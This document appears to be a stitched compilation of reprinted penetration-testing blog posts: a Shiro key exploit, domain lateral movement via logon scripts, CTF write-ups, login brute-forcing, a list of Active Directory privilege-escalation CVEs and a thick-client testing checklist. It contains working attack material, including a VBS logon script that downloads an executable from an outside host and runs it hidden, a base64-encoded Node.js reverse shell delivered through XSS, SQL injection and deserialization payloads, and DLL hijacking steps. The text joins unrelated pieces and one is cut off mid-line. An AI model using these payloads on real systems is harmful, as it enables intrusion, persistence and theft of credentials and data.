print(base64.b64encode(struct.pack('bbbbbbbbbbbbbbbbbbbb', 109,-96,12,-115,33,59,24,112,44,124,56,110,-15,59,1,-41))) Use the obtained key for successful utilization: Restart the server and get the shiro key again. You can see that the key has changed. The third point of the vulnerability principle is verified. Each time you start, a random key is generated: Switching to a new key can still be utilized: Reprinted from the original link: https://xz.aliyun.com/t/11908

0x1. Utilization scenario When obtaining domain control permissions or domain admin and other high permissions, if you want to horizontally go to the PC host in the domain, the other party opens the firewall, and cannot use it horizontally through 445 and 135, you can obtain the target host permissions through the login script binding method. 0x2. Utilization method Method 1: Powershell win2012 and above comes with it to obtain the current domain user information Get-ADUser -Filter * -Properties * | sort LastLogonDate | select name,mail,DistinguishedName,LastLogonDate | Export-Csv -Path C:\Users\Public\Documents\user.csv -Encoding utf8 Bind the specified user Set-ADUser -Identity zhangsan -ScriptPath 'download.vbs' Unbind Set-ADUser -Identity zhangsan -ScriptPath ' ' Method 2: Use dsmod for binding dsmod user -loscr'download.vbs''CN=john,CN=Users,DC=redteam,DC=com' Unbind dsmod user -loscr '' 'CN=john,CN=Users,DC=redteam,DC=com' Refresh group policy shell gpupdate /force VBS content strFileURL='http://192.168.172.129:82/logo.ico'strHDLocation='C:\Users\Public\Documents\ChsIME.exe'Set objXMLHTTP=CreateObject('MSXML2.XMLHTTP')objXMLHTTP.open'GET', strFileURL, falseobjXMLHTTP.send()If objXMLHTTP.Status=200 ThenSet objADOStream=CreateObject('ADODB.Stream')objADOStream.OpenobjADOStream.Type=1 'adTypeBinaryobjADOStream.Write objXMLHTTP.ResponseBodyobjADOStream.Position=0'Set the stream position to the startSet objFSO=Createobject('Scripting.FileSystemObject')If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocationSet objFSO=NothingobjADOStream.SaveToFile strHDLocationobjADOStream.CloseSet objADOStream=NothingEndifSet objXMLHTTP=NothingstrComputer='.'setws=wscript.createobject('wscript.shell')val=ws.run ('C:\Users\Public\Documents\ChsIME.exe',0) Upload to the directory dc c:\windows\SYSVOL\sysvol\redteam.com\SCRIPTS\, bind it through method one or two and refresh the group policy. https://www.cnblogs.com/websecyw/p/16657762.html

0x00 Preface Regarding the public test and exclusive test, how to pick up xss holes, hydrology, hydrology, hydrology! 0x01 Daily Test Daily boring testing site. When you are in penetration testing, you find that there is an html tag calling the image in the server, and it is the type that adds the server IP address. You can try to fuzz by modifying the host header to detect whether there is xss. Seeing this situation, we can roughly guess that the latter code may look like: img src='?php echo 'http://{$_SERVER['HTTP_HOST']}/'?xxx/aaa.png'/This seems very simple. Modifying the host in the request package can cause xss. Success pop-up window The tips to pick up rags were completed. Reprinted from the original link: https://blog.csdn.net/Guapichen/article/details/124040935?spm=1001.2014.3001.5501

babyphp index.php: ?php //something in flag.php class A { public $a; public $b; public function __wakeup() { $this-a='babyhacker'; } public function __invoke() { if (isset($this-a) $this-a==md5($this-a)) { $this-b-uwant(); } } } class B { public $a; public $b; public $k; function __destruct() { $this-b=$this-k; die($this-a); } } class C { public $a; public $c; public function __toString() { $cc=$this-c; return $cc(); } public function uwant() { if ($this-a=='phpinfo') { phpinfo(); } else { call_user_func(array(reset($_SESSION), $this-a)); } } } if (isset($_GET['d0g3'])) { ini_set($_GET['baby'], $_GET['d0g3']); session_start(); $_SESSION['sess']=$_POST['sess']; } else{ session_start(); if (isset($_POST['pop'])) { unserialize($_POST['pop']); } } var_dump($_SESSION); highlight_file(__FILE__); flag.php: ?php session_start(); highlight_file(__FILE__); //flag in the root directory if($_SERVER['REMOTE_ADDR']==='127.0.0.1'){ $f1ag=implode(array(new $_GET['a']($_GET['b']))); $_SESSION['F1AG']=$f1ag; }else{ echo 'only localhost!'; } By constructing a pop chain, you can see that session.serialize_handler is php, and combined with the source code of flag.php, it is speculated that the session deserializes SoapClient to perform ssrf The idea is to first control the parameter of ini_set to specify serialize_handler as php_serialize, pass the parameter sess as the payload of deserialization of SoapClient, then remove all get post parameters and access the page once to trigger deserialization. Finally, use the known pop chain to call the SoapClient __call method to trigger ssrf Ssrf first uses php's native class GlobIterator to find files starting with f in the root directory, and then uses SplFileObject to read flags. pop chain payload: ?php class A { public $a; public $b; } class B { } class C { public $a; public $c; } $cc=new C(); $cc-a='xxxx'; $a=new A(); $a-a='0e215962017'; $a-b=$cc; $c=new C(); $c-c=$a; $b=new B(); $b-a=$c; echo serialize($b); ssrf payload: ?php //$a=new SoapClient(null,array('location'='http://127.0.0.1/flag.php?a=GlobIteratorb=/f*', 'user_agent'='111\r\nCookie: PHPSESSID=c9urdtg4kjp5jl36mrl44qlsah', 'uri'='test')); $a=new SoapClient(null,array('location'='http://127.0.0.1/flag.php?a=SplFileObjectb=/f1111lllllllaagg', 'user_agent'='111\r\nCookie: PHPSESSID=c9urdtg4kjp5jl36mrl44qlsah', 'uri'='test')); $b=serialize($a); echo '|'.urlencode($b); Use GlobIterator first Reuse SplFileObject EZ_JS Login interface and enter the account password at will, and then it will jump to /cookie route, right-click to comment jsfuck decryption prompt enter capital Right-click the home page to comment as follows : !--This secret is 7 characters long for security! hash=md5(secret+'flag');//1946714cfa9deb70cc40bab32872f98a admin cookie is md5(secret+urldecode('flag%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00X%00%00%00%00%00%00%00dog')); -- One-eye hash length extension attack Change the cookie hash directly and found that it was useless. Later, the userid was empty, and an error occurred Combined with the previous tips, use the upper and lower case features of js : 'ı'.toUpperCase()=='I' //true Then jump to /infoflllllag (the static environment resets every 30 minutes, so the previous picture is captured) var express=require('express'); var router=express.Router(); const isObject=obj=obj obj.constructor obj.constructor===Object; const merge=(a, b)={ for (var attr in b) { if (isObject(a[attr]) isObject(b[attr])) { merge(a[attr], b[attr]); } else { a[attr]=b[attr]; } } Return a } const clone=(a)={ return merge({}, a); } router.get('/', function(req, res, next) { if(req.flag=='flag'){ //Output flag; res.send('flag???'); } res.render('info'); }); router.post('/', express.json(),function(req, res) { var str=req.body.id; var obj=JSON.parse(str); req.cookies.id=clone(obj); res.render('info'); }); module.exports=router; It is obvious that the flag attribute of req should be polluted through the prototype chain. The payload is as follows id={'__proto__':+{'flag':+'flag'}} Then turn to get to access the flag Screenshot of the static target machine ezupload Upload phpinfo first php 8.0.1, disable_functions filters a bunch, but file_get_contents() is available, and the source code of the question is read through it html Body form method='POST' enctype='multipart/form-data' This front end is not beautiful! input type='file' name='upload_file' / input type='submit' name='submit' value='submit' / /form /body /html ?php function waf($var): bool{ $blacklist=['\$_', 'eval','copy' ,'assert','usort','include', 'require', '$', '^', '~', '-', '%', '*','file','fopen','fwriter','fput','copy','curl','fread','fget','function_exists','dl','putenv','system','exec','shell_exec','passthru','proc_open','proc_close', 'proc_get_status','checkdnsrr','getmxrr','getservbyname','getservbyport','syslog','popen','show_source','highlight_file','`,'chmod']; foreach($blacklist as $blackword){ if(strstr($var, $blackword)) return True; } return False; } error_reporting(0); //Set Upload Directory define('UPLOAD_PATH', './uploads'); $msg='Upload Success!'; if (isset($_POST['submit'])) { $temp_file=$_FILES['upload_file']['tmp_name']; $file_name=$_FILES['upload_file']['name']; $ext=pathinfo($file_name,PATHINFO_EXTENSION); if(!preg_match('/php/i', strtolower($ext))){ die('I don't want pictures, Xiong Da'); } $content=file_get_contents($temp_file); if(waf($content)){ die('Oh, what are you doing, little heizi.'); } $new_file_name=md5($file_name).'.'.$ext; $img_path=UPLOAD_PATH . '/' . $new_file_name; if (move_uploaded_file($temp_file, $img_path)){ $is_upload=true; } else { $msg='Upload Failed!'; die(); } echo $msg.' '.$img_path; Bit operation | is not filtered. Here, take | as an example, use GlobIterator to find flags import re preg='\*' def convertToURL(s): if s 16: return '%0' + str(hex(s).replace('0x', '')) else: return '%' + str(hex(s).r

During the penetration test, there are a lot of web login pages. So what ideas should we use to conduct a test? Let’s take a look at some of my testers’ ideas. Test ideas How will it penetrate when you see a web login box like this? We can see that there is no verification code when logging in, and there will be a blasting problem. So what will the usernames of blasting exist in general 1.admin 2.test 3.root Here you can also find the operator test of the corresponding system, collect and manage accounts, and increase the chance of blasting. Blasting was carried out here, but there was no result Directory scanning We can scan the directory. Maybe some scanned directories have not been authenticated and can be accessed directly. After the above methods are not authorized by JS files, we will look at the JS files next Found that there is a /SystemMng/Index url in index.js We try to splice access After splicing it in, I found that there was nothing. Are you ready to give up? Don't worry, let's see if JS has found a surprise The splicing of several pieces is quite harmful. Take one to continue to use for everyone Combination punch weak password explosion has reached this point, we have obtained the administrator's account and phone number, and we can also reset their password directly (take the correct account and try to explode) You can see that password is encrypted and found as m5. We can use the transcoding and blasting provided by burp. The blasting is successful, the account is relatively complicated. I can't get the username without the previous operation. Login successfully Log in and return package test. Enter the logged-in account password at will. Log in and grab the package. After modifying his authentication data After modification, it was found that there was no data for jumping. There was still a leak in JS. The same method The overreach has now obtained the account password of an ordinary user. Then we should try a overreach of the right, vertical overreach or parallel overreach. Use the blasting account to log in and capture packets. The masters in this place can watch the data packets several times and return the packets when digging. When constructing, I thought it was a verification ID. After a few more rounds of testing, I found that I only recognized the code parameters. Never authorize to obtain all permissions on the website Original connection: https://xz.aliyun.com/t/11612

1.MS14-068kerberos certification, no PAC When a user applies for TGT (identity credentials generated by the ticket authorization service) from the Kerberos Key Distribution Center (KDC), he or she can forge his or her own Kerberos tickets. Vulnerability effect: Elevate any domain user to domain management permissions Conditions of use: 1. Domain control less than 2012R2 does not have patches for MS14-068 (KB3011780) 2. Get a computer that joins the domain 3. Have the domain user password and Sid of the computer in this domain How to use: There are detailed explanations in the article 《Kerberos认证及过程中产生的攻击》 This can be found at https://cloud.tencent.com/developer/article/1760132 2.CVE-2020-1472 NetLogon privilege escalation vulnerability (CVE-2020-1472) is a serious remote privilege escalation vulnerability in Windows domain control. The default vi vector in the AES authentication algorithm used by Netlogon is 0, which causes the attacker to bypass authentication. At the same time, the remote interface that sets the domain control password also uses this function, resulting in Set the password of the domain control machine user to empty. In this way, we can guide the domain hash and finally restore the password of the domain control machine user Vulnerability effect: This vulnerability can be used to obtain domain management access Affect version: Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2012Windows Server 2012 (Server Core installation) Windows Server 2012 R2 Windows Server 2012 R2 (Server Core installation) Windows Server 2016Windows Server 2016 (Server Core installation) Windows Server 2019Windows Server 2019 (Server Core installation) Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation) Windows Server, version 2004 (Server Core installation) How to use: Preparation tools: Impacket Toolkit: https://github.com/SecureAuthCorp/impacket.git poc: https://github.com/SecuraBV/CVE-2020-1472.git exp: https://github.com/dirkjanm/CVE-2020-1472 exp: https://github.com/risksense/zerologon https://cloud.tencent.com/developer/article/1780108 https://cloud.tencent.com/developer/article/1837483 3.CVE-2021-4228742278 The Windows Domain Service Permission Elevation Vulnerability (CVE-2021-42287, CVE-2021-42278) is because the Active Directory Domain Service does not implement appropriate security restrictions, resulting in the permission escalation that can be bypassed by security restrictions. Attackers can exploit this vulnerability to elevate ordinary user rights in the domain to domain administrator rights Vulnerability effect: Elevate any domain user to domain management permissions Affect version: Windows Server 2012 R2 (Server Core installation) Windows Server 2012 R2 Windows Server 2012 (Server Core installation) Windows Server 2012 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2016 (Server Core installation) Windows Server 2016 Windows Server, version 20H2 (Server Core Installation) Windows Server, version 2004 (Server Core installation) Windows Server 2022 (Server Core installation) Windows Server 2022 Windows Server 2019 (Server Core installation) Windows Server 2019 Conditions of use: (1) A common domain member account (2) Domain users have permission to create machine users (general default permissions) (3) DC has not been patched KB5008380 or KB5008602 How to use: https://github.com/WazeHell/sam-the-admin https://github.com/Ridter/noPac https://blog.csdn.net/FHLZLHQ/article/details/121964692 4.CVE-2021-1675/CVE-2021-34527 PrintNightmare This vulnerability was initially CVE-2021-1675, and then Microsoft assigned the vulnerability to CVE-2021-34527, and mentioned that the two vulnerabilities are very similar, but the attack vectors are different. Print Spooler is a service in Windows that manages print-related transactions. It is used to manage all local and network printing queues and control all printing work. The Print Spooler service is enabled by default in Windows system, and ordinary users can use this vulnerability to upgrade to SYSTEM management permissions. Vulnerability effect: Unauthenticated remote attackers can exploit this vulnerability to execute arbitrary code on the domain controller with SYSTEM permissions, thereby gaining control of the entire domain Affect version: Windows Server 2012 R2 (Server Core installation) Windows Server 2012 R2 Windows Server 2012 (Server Core installation) Windows Server 2012 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) Windows Server 2008 for 32-bit Systems Service Pack 2 Windows RT 8.1 Windows 8.1 for x64-based systems Windows 8.1 for 32-bit systems Windows 7 for x64-based Systems Service Pack 1 Windows 7 for 32-bit Systems Service Pack 1 Windows Server 2016 (Server Core installation) Windows Server 2016 Windows 10 Version 1607 for x64-based Systems Windows 10 Version 1607 for 32-bit Systems Windows 10 for x64-based Systems Windows 10 for 32-bit Systems Windows Server, version 20H2 (Server Core Installation) Windows 10 Version 20H2 for ARM64-based Systems Windows 10 Version 20H2 for 32-bit Systems Windows 10 Version 20H2 for x64-based Systems Windows Server, version 2004 (Server Core installation) Windows 10 Version 2004 for x64-based Systems Windows 10 Version 2004 for ARM64-based Systems Windows 10 Version 2004 for 32-bit Systems Windows 10 Version 21H1 for 32-bit Systems Windows 10 Version 21H1 for ARM64-based Systems Windows 10 Version 21H1 for x64-based Systems Windows 10 Version 1909 for ARM64-based Systems Windows 10 Version 1909 for x64-based Systems Windows 10 Version 1909 for 32-bit Systems Windows Server 2019 (Server Core installation) Windows Server 2019 Windows 10 Version 1809 for ARM64-based Systems Windows 10 Version 1809 for x64-based Systems Windows 10 Version 1809 for 32-bit Systems Utilization scenarios In the working group environment, the highest system permissions can be obtained through this vulnerability; in the domain environment, the direct attack domain controller can obtain the SYSTEM permissions of the domain control and execute any code; it can be used for persistent operations. After obtaining the domain control, the DLL in the shared directory can be loaded remotely when there is a shared directory and the domain control can be accessed. Conditions of utilization The target enables the Spooler service; a domain account with ordinary permissions; the created Smb service allows anonymous access, that is, the target can directly obtain the file. How to use https://github.com/cube0x0/CVE-2021-1675 https://github.com/cube0x0/impacket https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer https://bewhale.github.io/posts/29501.html https://mp.weixin.qq.com/s/1sR0wTyJFf5UnuPjtJ-DWw 5.CVE-2019-1040 In June 2019, Microsoft released a security update. This update fixes the CVE-2019-1040 vulnerability. In this vulnerability, an attacker can bypass NTLM MIC (Message Integrity Check) protection through a man-in-the-middle attack and relay authentication traffic to the target server. Vulnerability effect This attack allows an attacker to remotely control any machine in the Windows domain, including a domain control server, if only one ordinary domain account is available. Affect version Windows 7 sp1 to Windows 10 1903 Windows Server 2008 to Windows Server 2019 Utilization scenarios For specific environments, the attack chain of the CVE-2019-1040 vulnerability has been identified in two attack methods: 1. Attack the Exchange Server domain (described in this way below) 2. Attack Domain AD Server (combined with resource-based constraint delegation) Conditions of utilization A. Exchange server can be any version (including versions patched for PrivExchange). The only requirement is that Exchange has high permissions by default when installed in shared permissions or RBAC mode. B. Any account in the domain. (Since the only requirement for generating SpoolService errors is any authenticated in-domain account) C. The essence of the CVE-2019-1040 vulnerability is that there are defects in NTLM packet integrity verification, so the NTLM authentication packet can be modified without invalidating the authentication. In this attack chain, the attacker deleted the flag in the packet that prevents forwarding from SMB to LDAP. D. Construct the request to enable Exchange Server to authenticate to the attacker and relay the authentication to the domain controller through LDAP, so that the permissions of the relay victim can be used to perform operations in Active Directory. For example, grant DCSync permissions to the attacker's account. E. If there are users in a trusted but completely different AD forest, you can also perform the exact same attack in the domain. (Because any authenticated user can trigger a SpoolService reverse connection) Vulnerability Exploit Attack Chain 1. Use any account in the domain to connect to the attacked Exchange Server through SMB, and specify the relay attack server. At the same time, the reverse SMB link must be triggered using the SpoolService error. 2. The relay server returns to the attacker's host through SMB, and then uses ntlmrelayx to relay the SMB request packet after modifying the NTLM authentication data using the CVE-2019-1040 vulnerability to LDAP. 3. Use relayed LDAP authentication. At this time, Exchange Server can grant DCSync permissions to the attacker's account. 4. The attacker's account uses DCSync to dump the hash of all domain user passwords in the AD domain (including the hash of the domain administrator, and the entire domain has been taken down at this time). How to use: https://github.com/SecureAuthCorp/impacket https://github.com/dirkjanm/krbrelayx https://github.com/Ridter/CVE-2019-1040 https://github.com/Ridter/CVE-2019-1040-dcpwn In the same network segment: https://www.freebuf.com/vuls/274091.html Under the tunnel: https://zhuanlan.zhihu.com/p/142080911 CVE-2019-1040+RBCD (Resource-based binding delegation)+PetitPatom 6. Domain delegation attack https://mp.weixin.qq.com/s/GdmnlsKJJXhElA4GuwxTKQ 7.NTLM Relay https://www.anquanke.com/post/id/193149https://www.anquanke.com/post/id/193493https://www.anquanke.com/post/id/194069https://www.anquanke.com/post/id/194514 8. ADCS vulnerability-ESC8 (PetitPotam)(ADCS relay) ESC8 is an http ntlm relay because ADCS authentication supports NTLM authentication. Vulnerability effect: Elevate ordinary domain users to domain management permissions Conditions of use: 1. No patches to adcs 2. There are two domain controls 3. There are adcs services How to use: https://blog.csdn.net/qq_43645782/article/details/119322322 https://forum.butian.net/share/1583 9. ADCS vulnerability--CVE-2022–26923 Vulnerability Impact : allows low-privileged users to elevate permissions to domain administrators in a default Active Directory environment with Active Directory Certificate Services (AD CS) server role installed Vulnerable Component: Active Directory Certificate Services (AD CS) Brief description of vulnerability: By constructing a machine account and tampering with the dNSHostName attribute, AD CS embeds the dNSHostName attribute into the certificate when applying for the certificate, and the machine account obtains a high-authorized domain control identity. Affected Windows versions: Windows 8.1 Windows 10 Version 1607, 1809, 1909, 2004, 20H2, 21H1, 21H2 Windows 11 Windows Server 2008, 2012, 2016, 2019, 2022 Utilization prerequisites: The CVE-2022-26923/CVE-2022-26931 vulnerability is similar to the 2021 CVE-2021-42278/CVE-2021-42287sAMAccountName spoofing vulnerability. Both use the forged domain controller name identity to perform related privilege raising operations. Its utilization prerequisites are: The privilege escalation vulnerability applies to all Windows Server Active Directory versions, including Windows Server 2012 R2 to Windows Server 2022 currently within the scope of Microsoft's product support, and older Windows Server versions beyond the scope of the product support. The intruder controls at least one active directory user account that has "Validated write to DNS host name" permission for at least one computer account in the active directory. By default, a single active directory Normal domain user can join or create (including creating an empty account) 10 computer accounts into the active directory and have CREATOR OWNER administrative permissions (including "Validated write to DNShost name" permission) for the computer accounts he has joined/created. Therefore, this permission is easier to obtain. The enterprise certificate service is deployed on the active directory and allows the above controlled computer accounts to apply for a computer authentication certificate. Enterprise Certificate Service is a related basic service that is widely deployed in the Active Directory, and by default, the Enterprise Certificate Service integrated with the Active Directory allows computers within the domain to apply for computer authentication certificates by default. Reproduction reference: https://forum.butian.net/share/1578 https://forum.butian.net/share/1583 10. Exchange related, can control the Exchange server Exchange plays an important role in the domain. Generally speaking, getting permissions to the Exchange server is basically equivalent to getting permissions to the domain management. When you get the Exchange server, there is a high probability that the domain manager will log in directly. Or the domain manager has logged in. When you get the Exchange server permissions, you can try to directly dir the domain controlled C drive to see if there is permission. If you don't have permission, try to use mimikatz to catch a wave of passwords. There is a high probability that you can directly catch the domain manager or high-authorized user. Moreover, even a higher version of the server can catch the plaintext password on Exchange. 11.CVE-2018-8581 (use domain control) Vulnerability description: This vulnerability exploits SSRF and high-privileged requests for Exchange servers, resulting in users with legitimate mailbox credentials being elevated to domain-managed permissions Scope of impact: Exchange Server 2010 Exchange Server 2013 Exchange Server 2016 Conditions of use: By default, the attacker has legitimate mailbox user credentials. At the same time, the exploit is raising the authority through NTLM Relay, so the attacker needs to already obtain available hosts in the intranet environment. Vulnerability Introduction: The vulnerability occurs in several aspects: First, Exchange allows any user (as long as it is authenticated) to create a push subscription (Push Subscription) through the EWS interface, and can specify any URL as the destination for notification push; secondly, after the notification is subscribed to push, Exchange uses the DefaultCredentials property of the CredentialCache class when push is triggered. Since EWS runs with SYSTEM permission, HTTP requests issued when using DefaultCredentials will use this permission to initiate NTLM authentication; in EWS requests, by using SerializedSecurityContext in the Header, specifying SID can implement identity masquerading, thereby performing EWS call operations as a specified user. In other words, [We can control the Exchange server to initiate an NTLM request for the HTTP protocol to us, so that we can get the Net-Ntlm Hash of the Exchange machine user] Since this exploit involves replay attacks by NTLM, an easy idea to think of is to replay the credentials to the domain control machine. Since the replayed NTLM credentials come from the machine user permissions of the Exchange server, according to the description in the Relay To LDAP section, we know that the Exchange machine user has write-acl permissions, which can raise permissions to any user and give Dcsync permissions, thereby dumping all password hashes. Whether the server requires signature: The server we relay is Ldap. In the previous section [ldap signature], the default policy of the Ldap server is negotiated signature. Whether to sign or not is determined by the client. The client is divided into situations. If it is the SMB protocol, the signature is required by default. If it is the webadv or http protocol, the signature is not required. The request initiated in this vulnerability is the http protocol, which means we don’t have to do anything and does not require signatures in this vulnerability. EXP : https://github.com/Ridter/Exchange2domain #You can also use ntlmrelayx.py+privexchange.py+secretdump.py https://github.com/dirkjanm/privexchange https://github.com/SecureAuthCorp/impacket For reproduction, please refer to this article: https://www.jianshu.com/p/e081082cbc73 CVE-2020-0688 (RCE) Vulnerability Description: When an attacker obtains a user account password that can access the Exchange Control Panel (ECP) component through various means, he can execute any code on the attacked exchange and directly obtain server permissions. Utilization conditions: Exchange Server 2010 SP3/2013/2016/2019, ordinary account. Attack script: https://github.com/zcgonvh/CVE-2020-0688 https://github.com/random-robbie/cve-2020-0688 Reappearance: https://www.anquanke.com/post/id/226543#h3-13 12.CVE-2020-17144 (RCE) Vulnerability description: Remote attackers can bypass authentication and exploit vulnerabilities by constructing special cmdlet parameters.

0x00 Introduction This project mainly targets penetration testing of PC client (CS architecture), combining its own testing experience and network data to form a checklist. If you have any questions, please contact us and look forward to everyone to contribute more skills and cases. 0x01 Overview PC client, GUI with rich functions, C-S architecture. 0x02 Development Language C# (.NET), JAVA, DELPHI, C, C++. 0x03 Protocol TCP, HTTP(S), TDS. 0x04 Database oracle, mssql, db2. 0x05 Test Tool //Related tools download: https://github.com/theLSA/hack-cs-tools dvta: pc client shooting range ida pro: Static analysis tool ollydbg: Dynamic Analysis Tool CFF Explorer: PE file analysis PEID: Shell Check Tool exeinfope/studype: pe file analysis wireshark: Observe traffic tcpview: Observe tcp traffic echo Mirage: can intercept tcp traffic burpsuite: http(s) packet capture proxifier: Global proxy traffic procmon: File and Registry Monitoring regshot: registry changes comparison process Hacker: process analysis RegfromApp: Registry Monitoring WSExplorer: Year Alliance Process Packet Catching Tool strings: view the program's string .net[anti]compilation: dotpeek de4dot dnspy ilspy sae ildasm ilasm Java Decompilation jad jd-gui jadx dex2jar Online version: javare.cn www.javadecompilers.com Reflexil: Assembly editor (can be used as an ilspy plugin) Vcg: Automated code auditing tool BinScope: BinScope 0x06 Agent Settings Most clients do not have proxy configuration function and need to set up global proxy by themselves, as follows: 1) IE-internet settings-connection-LAN settings. 2) proxifier -- proxy server/proxification rules //Http's traffic can be combined with burpsuite for easy testing (proxy server is set to burp proxy address). 0x07 Test Point 0. Information Collection Compilation information, development environment/language, usage protocol, database, ip, obfuscation/encryption, whether to shell, etc. Case 0-CFF view client information (such as compilation environment) dvta 1. Reverse Engineering Decompile, source code leakage, hardcoded key/password, encrypted and decrypted logic, role judgment logic (0-admin, 1-normaluser), backdoor, etc. Case 0 - Decompile to obtain encryption and decryption logic and write decryption tools dvta Information obtained through this logic and Encrypted Text:CTsvjZ0jQghXYWbSRcPxpQ== AES KEY:J8gLXc454o5tW2HEF7HahcXPufj9v8k8 IV:fq20T0gMnXa6g0l4 Write decryption tools using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Windows.Forms; using System.Security.Cryptography; namespace aesdecrypt { public partial class aesdecrypt : Form { public aesdecrypt() { InitializeComponent(); } private void decrypt(object sender, EventArgs e) { String key="J8gLXc454o5tW2HEF7HahcXPufj9v8k8"; String IV="fq20T0gMnXa6g0l4"; String encryptedtext="CTsvjZ0jQghXYWbSRcPxpQ=="; byte[] encryptedBytes=Convert.FromBase64String(encryptedtext); AesCryptoServiceProvider aes=new AesCryptoServiceProvider(); aes.BlockSize=128; aes.KeySize=256; aes.Key=System.Text.ASCIIEncoding.ASCII.GetBytes(key); aes.IV=System.Text.ASCIIEncoding.ASCII.GetBytes(IV); aes.Padding=PaddingMode.PKCS7; aes.Mode=CipherMode.CBC; ICryptoTransform crypto=aes.CreateDecryptor(aes.Key, aes.IV); byte[] decryptedbytes=crypto.TransformFinalBlock(encryptedBytes, 0, encryptedBytes.Length); String decryptedString=System.Text.ASCIIEncoding.ASCII.GetString(decryptedbytes); Console.WriteLine("\n"); Console.WriteLine("################Decrypt Database password############\n"); Console.WriteLine("Decrypted Database password:" + decryptedString+"\n"); Console.WriteLine("################Done###############\n"); } } } //The decryption code originated from https://resources.infosecinstitute.com/damn-vulnerable-thick-client-app-part-5/#article Case 1 - Decompile and modify the code logic to allow ordinary users to log in as administrators dvta 1-Isadmin 0-Normaluser Change 1 to 0 to determine admin 2. Information leakage Plain text sensitive information, sensitive files (such as xxx.config in the installation directory). Registry: Use regshot to compare the differences in registry before and after client runs (such as login). Development and debug log leaks (such as dvta.exe log.txt) The process hacker views plain text sensitive data (such as account password/key) in the client memory. strings directly view client strings (such as ip information). View source code (such as github, gitee, etc.) Case 0-Configuration sensitive information leakage dvta Case 1-Memory leak database account password dvta Case 2-The source code contains hard-coded ftp account password dvta Case 3-Development and debugging log leak dvta Case 4 - Save the account password locally after logging in to a certain system //This case comes from https://blog.csdn.net/weixin_30685047/article/details/95916065 3. Transmission traffic wireshark/echo Mirage/burpsuite+nopeproxy/fillder/charles Account password transmitted in plain text by protocols such as ftp SQL statement plaintext transmission (such as using construct injection, overprivileges, etc.) Case 0 - Zhengfang Academic Affairs System SQL statement transmission plain text, return plain text data //This case comes from wooyu Case 1-The data packet returns the database account password at a certain system login 4. Other vulnerabilities Username enumeration Case 0 Brute force cracking Such as login function. Case 0 Weak password You can try admin 123456, etc. Personal clear text transmission SQL statement exposed Case 0 Case 1 SQL Injection If login, universal password xxx’ or ‘x’=’x xxx’ or 1=1-- At the input box, construct a closed error, such as ', '), %'), order by 100---, etc. The data is injected using display bits or errors. The principle is the same as web injection, and different databases are similar. Case 0-oracle injection ' union select null,null,(select user from dual),null,null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from dual-- Case 1-mssql injection 111') and (select user)0-- CSV injection If you export excel, enter 1+1 and see if it is 2 after exporting. XSS Such as Electron, NodeWebKit, etc. Case 0-Chinese Ant Sword xss to RCE Environment: win7+phpstudy(php5.6.27-nts)+perl+nc+antsword2.0.5 xss webshell: ?php header('HTTP/1.1 500 img src=# onerror=alertx'); windows+node.js: success var net=require('net'), sh=require('child_process').exec('cmd.exe'); var client=new net.Socket(); client.connect(6677, '127.0.0.1', function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); ?php header('HTTP/1.1 500 Not img src=# onerror='eval(new Buffer(dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVj dCg2Njc3LCAiMTI3LjAuMC4xIiwgZnVuY3Rpb24oKXtjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTsKc2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=,base64).toString())''); Related reference https://www.anquanke.com/post/id/176379 Command execution Case 0-Evernote Windows Client 6.15 Local file reading and remote command execution http://blog.knownsec.com/2018/11/%E5%8D%B0%E8%B1%A1%E7%AC%94%E8%AE%B0-windows-%E5%AE%A2%E6%88%B7%E7%AB%AF-6-15-%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E5%92%8C%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/ Case 1-A cloud pc client command execution mining process https://www.secpulse.com/archives/53852.html Case 2-Kingsoft WPS Mail Mail Client Remote Command Execution Vulnerability (Mozilla-based XUL Program Utilization Tips) https://shuimugan.com/bug/view?bug_no=193117 The test points are the same as the web. DLL hijacks Linux file search order: Current directory PATH order value directory program search Dll order: //No absolute path is provided 1. The directory where the application loads. 2. Current directory. 3. System directory (C:\Windows\System32\). 4.16-bit system directory. 5. Windows directory. 6. Directory of PATH variable. The program can load malicious dlls placed by the attacker. Use procmon to search for the dll loaded by the program and observe the name not found. msf generates malicious dlls and places them at the program loading location. Running the program can trigger payload. Case 0-dll hijacking dvta Logistic defect The test point is the same as the web. Authorization and certification defect Registry key value, authorization server returns information construction. Related reference https://cloud.tencent.com/developer/article/1430899 Unauthorized Case 0-Arbitrary operation of Zhengfang Academic Affairs System Database You can take over the database by knowing IP